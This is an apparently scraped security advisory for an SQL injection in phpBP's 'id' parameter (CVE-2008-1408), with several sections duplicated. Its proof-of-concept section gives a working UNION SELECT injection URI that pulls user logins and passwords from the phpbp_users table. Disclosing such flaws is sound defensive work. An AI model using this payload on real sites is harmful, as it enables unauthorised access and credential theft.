phpBP 'id' Parameter SQL Injection Vulnerability
BID:28272
Info
phpBP 'id' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 28272 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-1408 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 17 2008 12:00AM |
| Updated: | May 07 2015 05:32PM |
| Credit: | [email protected] is credited with discovering this issue. |
| Vulnerable: |
PHP BP Team phpBP RC3 2.204 FIX4 |
| Not Vulnerable: | |
Discussion
phpBP 'id' Parameter SQL Injection Vulnerability
phpBP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects phpBP RC3 (2.204) FIX4; other versions may also be vulnerable.
phpBP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
This issue affects phpBP RC3 (2.204) FIX4; other versions may also be vulnerable.
Exploit / POC
phpBP 'id' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?function=banner_out&id=10000/**/LIMIT/**/0/**/UNION/**/SELECT/**/1,2,concat(0x687474703A2F2F,login,0x5F,pass),4,5,6,7,8,9/**/FROM/**/phpbp_users/**/LIMIT/**/1/*
Solution / Fix
phpBP 'id' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].